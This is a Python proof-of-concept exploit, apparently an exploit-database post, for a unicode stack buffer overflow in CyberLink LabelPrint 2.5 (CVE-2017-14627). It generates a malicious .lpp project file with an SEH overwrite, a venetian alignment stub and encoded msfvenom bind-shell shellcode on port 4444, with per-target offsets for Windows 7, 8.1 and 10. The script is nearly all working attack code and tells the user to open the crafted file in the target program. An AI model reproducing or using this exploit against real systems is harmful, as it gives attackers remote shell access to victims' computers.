CyberLink LabelPrint Buffer Overflow
Posted on 26 September 2017
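#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.
#
# Review notes on this copy of the PoC:
#   * The project file is written in binary mode, so the bytes on disk are exactly the
#     bytes assembled here (text mode rewrites the 0x0a bytes as \r\n on Windows, which
#     would shift everything after the header).
#   * Target selection reads a plain string. The original used Python 2 input(), which
#     eval()s whatever is typed at the prompt.
#   * The per-target constants are passed to exp() explicitly instead of being picked up
#     from module globals, and the bare "except:" that hid every error is gone.
#   * Opcode comments give the immediate as it reads after unicode widening
#     (each byte followed by 0x00), e.g. b"\x05\x09\x01" -> add eax, 0x01000900.
#   * Runs unchanged on Python 2 and Python 3.

try:
    _read_line = raw_input  # Python 2: returns the typed text; input() there would eval() it
except NameError:           # Python 3: input() already returns a string
    _read_line = input

OUTPUT_FILENAME = "labelprint_poc_universal.lpp"

# .lpp project skeleton around the overflowing TRACK "name" attribute.
HEADER = (b'<PROJECT version="1.0.00">\n'
          b'\t<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">')
TRACK_OPEN = b'\t\t<TRACK name="'
TRACK_CLOSE = b'"/> '
FOOTER = b'\t</INFORMATION>\n</PROJECT>'

PAYLOAD_LEN = 15000      # total length of the TRACK name value; the tail is NOP padding
NOP = b"\x42"            # venetian nop (the original comments it as "nop/inc edx")
JUNK = b"A" * 790        # filler up to the SEH record
NSEH = b"\x61\x42"       # next-SEH overwrite
SEH = b"\x2c\x44"        # SEH handler overwrite; widens to 0x0044002C

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
SHELLCODE = (
    b"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
    b"AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
    b"ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
    b"QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
    b"GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
    b"lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
    b"o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
    b"NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
    b"OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
    b"kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
    b"aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
    b"eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
    b"S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
    b"BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
    b"QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
)

# OS-specific knobs of the venetian stub: two "add eax, imm32" instructions and two
# padding runs. Values are the ones the original PoC shipped for each tested OS.
TARGETS = {
    "1": {
        "label": "Windows 7 x86 bindshell on port 4444",
        "align": b"\x05\x09\x01",    # add eax, 0x01000900
        "align2": b"\x05\x0A\x01",   # add eax, 0x01000A00
        "junk1": b"\x42" * 68,
        "junk2": b"\x42" * 893,
    },
    "2": {
        "label": "Windows 8.1 x64 bindshell on port 4444",
        "align": b"\x05\x09\x01",    # add eax, 0x01000900
        "align2": b"\x05\x0A\x01",   # add eax, 0x01000A00
        "junk1": b"\x42" * 116,
        "junk2": b"\x42" * 845,
    },
    "3": {
        "label": "Windows 10 x64 bindshell on port 4444",
        "align": b"\x05\x05\x01",    # add eax, 0x01000500
        "align2": b"\x05\x06\x01",   # add eax, 0x01000600
        "junk1": b"\x42" * 136,
        "junk2": b"\x42" * 313,
    },
}


def build_payload(align, align2, junk1, junk2):
    """Return the TRACK name value: JUNK | NSEH | SEH | venetian stub | shellcode | NOP pad.

    Args:
        align, align2: 3-byte "add eax, imm" sequences for the target OS.
        junk1, junk2: OS-specific padding runs inside the stub.

    Returns:
        Exactly PAYLOAD_LEN bytes. Every byte is below 0x80, which is what lets the
        buffer survive the unicode widening the target performs.

    Raises:
        ValueError: if the assembled buffer already exceeds PAYLOAD_LEN (the original
        silently emitted an oversized, unpadded buffer in that case).
    """
    stub = b"".join([
        NOP,
        b"\x54",            # push esp
        NOP,
        b"\x58",            # pop eax
        NOP,
        b"\x05\x1B\x01",    # add eax, 0x01001B00 (universal)
        NOP,
        b"\x2d\x01\x01",    # sub eax, 0x01000100
        NOP,
        b"\x50",            # push eax
        NOP,
        b"\x5c",            # pop esp
        # RET (0xC3) is a bad char, so the ret opcode is assembled in eax instead.
        NOP,
        b"\x25\x7e\x7e",    # and eax, 0x7e007e00
        NOP,
        b"\x25\x01\x01",    # and eax, 0x01000100
        NOP,
        b"\x35\x7f\x7f",    # xor eax, 0x7f007f00
        NOP,
        b"\x05\x44\x44",    # add eax, 0x44004400
        NOP,
        b"\x57",            # push edi
        NOP,
        b"\x50",            # push eax
        junk2,              # OS-specific padding
        # custom venetian: point eax at our buffer
        b"\x58",            # pop eax
        NOP,
        b"\x58",            # pop eax
        NOP,
        align,              # OS-specific add eax, imm
        NOP,
        b"\x2d\x01\x01",    # sub eax, 0x01000100
        NOP,
        b"\x50",            # push eax
        NOP,
        # call esp 0x7c32537b (MFC71U.dll), assembled from two halves
        b"\x5C",            # pop esp
        NOP,
        b"\x58",            # pop eax
        NOP,
        b"\x05\x53\x7c",    # add eax, 0x7c005300 (upper part of the call esp address)
        NOP,
        b"\x50",            # push eax
        junk1,              # OS-specific padding
        b"\x7b\x32",        # remaining part of the call esp address
        # preparing for shellcode
        NOP * 114,
        b"\x57",            # push edi
        NOP,
        b"\x58",            # pop eax
        NOP,
        align2,             # OS-specific add eax, imm
        NOP,
        b"\x2d\x01\x01",    # sub eax, 0x01000100
        NOP,
        SHELLCODE,
    ])
    body = JUNK + NSEH + SEH + stub
    if len(body) > PAYLOAD_LEN:
        raise ValueError("payload is %d bytes, exceeds %d" % (len(body), PAYLOAD_LEN))
    return body + NOP * (PAYLOAD_LEN - len(body))


def build_project(payload):
    """Wrap *payload* in the .lpp skeleton exactly as the original PoC did (header, one
    space, then the TRACK element and closing tags)."""
    return HEADER + b" " + TRACK_OPEN + payload + TRACK_CLOSE + FOOTER


def exp(align, align2, junk1, junk2, filename=OUTPUT_FILENAME):
    """Write the crafted project file for one target and return its path.

    The file is opened in binary mode so the 0x0a bytes in the skeleton are not
    rewritten as \\r\\n on Windows. The original read these four values from module
    globals set by the menu; they are explicit parameters here.
    """
    data = build_project(build_payload(align, align2, junk1, junk2))
    with open(filename, "wb") as fh:
        fh.write(data)
    print("[+] File %s successfully created!" % filename)
    print("[*] Now open project file %s with CyberLink LabelPrint." % filename)
    print("[*] Good luck ;)")
    return filename


def main():
    """Interactive entry point: show the target menu, build the file for the choice."""
    print("[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->")
    print("[*] by f3ci & modpr0be <research[at]spentera.id>")
    print("[*] <-------------------------------------------------> ")
    for key in sorted(TARGETS):
        print(" %s.%s" % (key, TARGETS[key]["label"]))
    try:
        choice = _read_line("Choose Target OS : ").strip()
    except (EOFError, KeyboardInterrupt):
        print("")
        return
    target = TARGETS.get(choice)
    if target is None:
        print("Choose the right one :)")
        return
    exp(target["align"], target["align2"], target["junk1"], target["junk2"])


if __name__ == "__main__":
    main()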